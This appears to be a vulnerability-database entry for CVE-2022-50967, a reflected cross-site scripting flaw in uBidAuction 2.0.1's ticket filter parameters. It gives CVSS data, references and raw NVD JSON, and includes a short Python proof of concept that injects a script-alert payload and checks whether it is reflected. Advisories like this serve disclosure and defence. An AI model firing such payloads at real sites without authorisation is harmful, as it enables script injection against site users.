CVE-2022-50967

Description

uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the tickets/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

uBidAuction 2.0.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL of the vulnerable application
target_url = "http://example.com/tickets/manage"

# Vulnerable parameters: date_created, date_from, date_to, created_at
# Injecting a basic XSS proof-of-concept payload
params = {
    "date_from": "<script>alert('CVE-2022-50967');</script>",
    "date_to": "2023-01-01"
}

# Sending the crafted GET request
response = requests.get(target_url, params=params)

# Verifying if the payload is reflected in the response
if "<script>alert('CVE-2022-50967');</script>" in response.text:
    print("The application is vulnerable to Reflected XSS.")
else:
    print("Payload not found or filtered.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2022-50967
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2022-50967
[3] CVE Details https://www.cvedetails.com/cve/CVE-2022-50967/
[4] VulDB https://vuldb.com/cve/CVE-2022-50967
[5] https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script
[6] https://www.exploit-db.com/exploits/50693
[7] https://www.vulncheck.com/advisories/ubidauction-tickets-manage-reflected-xss
[8] https://www.vulnerability-lab.com/get_content.php?id=2289

Raw JSON Data

JSON

{"cve": {"id": "CVE-2022-50967", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:34.610", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "uBidAuction 2.0.1 contains a reflected cross-site scripting vulnerability in the tickets/manage module. The date_created, date_from, date_to, and created_at parameters in the filter functionality are not properly sanitized, allowing remote attackers to inject malicious scripts via crafted GET requests that execute in victims' browsers."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50693", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ubidauction-tickets-manage-reflected-xss", "source": "[email protected]"}, {"url": "https://www.vulnerability-lab.com/get_content.php?id=2289", "source": "[email protected]"}]}}